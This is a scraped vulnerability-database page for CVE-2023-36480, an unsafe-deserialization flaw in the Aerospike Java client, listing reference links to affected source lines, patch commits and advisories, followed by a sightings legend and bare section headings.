      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2023-36480 (GCVE-0-2023-36480)

GHSA-JJ95-55CR-9597

GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2023-044

Summary

Product

Tested Version

Details

Issue: Unsafe deserialization of server responses (GHSL-2023-044)

Impact

Remediation

Resources

GitHub Security Advisories

Credit

Contact

Disclosure Policy

GSD-2023-36480

CVE-2023-36480

FKIE_CVE-2023-36480

Tags

Sightings

Nomenclature

GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2023-044`

Issue: Unsafe deserialization of server responses (`GHSL-2023-044`)